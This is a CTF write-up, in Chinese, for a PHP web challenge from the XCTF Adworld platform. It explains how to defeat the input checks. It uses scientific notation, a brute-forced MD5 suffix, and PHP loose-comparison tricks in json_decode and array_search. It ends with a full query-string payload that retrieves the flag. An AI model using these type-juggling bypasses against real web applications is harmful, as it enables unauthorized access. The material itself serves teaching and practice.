题目来源:

题目来源

https://adworld.xctf.org.cn/

题目概览

一进来引入眼帘的就是一段PHP。

image-20220926212016805

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;

$a = $_GET['a'];
$b = $_GET['b'];

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
    if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
        $key1 = 1;
        }else{
            die("Emmm...再想想");
        }
    }else{
    die("Emmm...");
}

$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
        $d = array_search("DGGJ", $c["n"]);
        $d === false?die("no..."):NULL;
        foreach($c["n"] as $key=>$val){
            $val==="DGGJ"?die("no......"):NULL;
        }
        $key2 = 1;
    }else{
        die("no hack");
    }
}else{
    die("no");
}

if($key1 && $key2){
    include "Hgfks.php";
    echo "You're right"."\n";
}

?>

分析一下代码吧。GET传三个参数abc,满足一系列条件让$key1=1 && $key2=1,然后获取flag

参数a

a只有这一小段戏码。intval($a)$a转化成整数然后要满足大于6000000同时长度小于等于3。怎么办?可以想到使用科学计数法。

所以a=6e7

1
if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3)

参数b

1
if(isset($b) && '8b184b' === substr(md5($b),-6,6))

这段代码截取$b经过md5加密后的最后六位字符,需要满足=== '8b184b'。所以要找一个数字或字符串,经过md5加密后最后六位为8b184b

跑个代码就得到了,得到结果为53724。

1
2
3
4
5
6
7
8
9
import hashlib
for i in range(0, 100000):
    hl=hashlib.md5()
    s = str(i)
    hl.update(s.encode(encoding='utf8'))
    md5=hl.hexdigest()
    if str(md5)[-6:] == "8b184b":
        print(s + ":" +  str(md5))
        break

所以b=53724

ab解决之后就可以让$key1=1了。

参数c

这一个参数应该是最难的,反正我是搞了很久。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
        $d = array_search("DGGJ", $c["n"]);
        $d === false?die("no..."):NULL;
        foreach($c["n"] as $key=>$val){
            $val==="DGGJ"?die("no......"):NULL;
        }
        $key2 = 1;
    }else{
        die("no hack");
    }
}else{
    die("no");
}

第一行可知,传入的c应该是一个JSON格式的字符串,然后解析成数组。

首先判断@$c["m"]是否为数字,如果是就寄了。还需要满足$c["m"]大于2022。

1
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022)

又是弱类型比较,第一部分这样就可以了。

1
2
3
{
    "m":"2023a",
}

@$c["n"]为含两个元素的数组,且$c["n"][0]也为数组。

1
if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0]))

所以继续补充如下。

1
2
3
4
5
6
7
{
    "m":"2023a",
    "n": [
        [1, 2, 3],
        [4, 5, 6]
    ]
}

最后一部分了。

1
2
3
4
5
$d = array_search("DGGJ", $c["n"]);
        $d === false?die("no..."):NULL;
        foreach($c["n"] as $key=>$val){
            $val==="DGGJ"?die("no......"):NULL;
        }

$d = array_search("DGGJ", $c["n"]);$d = = = false?die("no..."):NULL;这两句,在数组$c["n"]中寻找DGGJ,所以继续补充我们的c如下。

1
2
3
4
5
6
7
{
    "m":"2023a",
    "n": [
        [1, 2, 3],
        "DGGJ"
    ]
}

这段代码遍历$c["n"]数组中的值,如果出现了DGGJ则退出进程。得想点办法绕过去。

1
2
3
foreach($c["n"] as $key=>$val){
	$val==="DGGJ"?die("no......"):NULL;
}

还是回到array_search()这个函数,把c中的DGGJ换成0即可。

这里的array_search()没有设置strict参数(如果该参数被设置为 TRUE,则函数在数组中搜索数据类型和值都一致的元素),我们就可以用0DGGJ进行弱比较,0 == 'DGGJ'

这样最后的c就整出来了。

1
2
3
4
5
6
7
{
    "m":"2023a",
    "n": [
        [1, 2, 3],
        0
    ]
}

拿下flag

所以最后payload为:

1
2
3
4
?a=6e7&b=53724&c={"m":"2023a","n":[[1,2,3],0]}

#url编码
?a=6e7&b=53724&c=%7B%22m%22%3A%222023a%22%2C%22n%22%3A%5B%5B1%2C2%2C3%5D%2C0%5D%7D

拿下flag

image-20220926220154599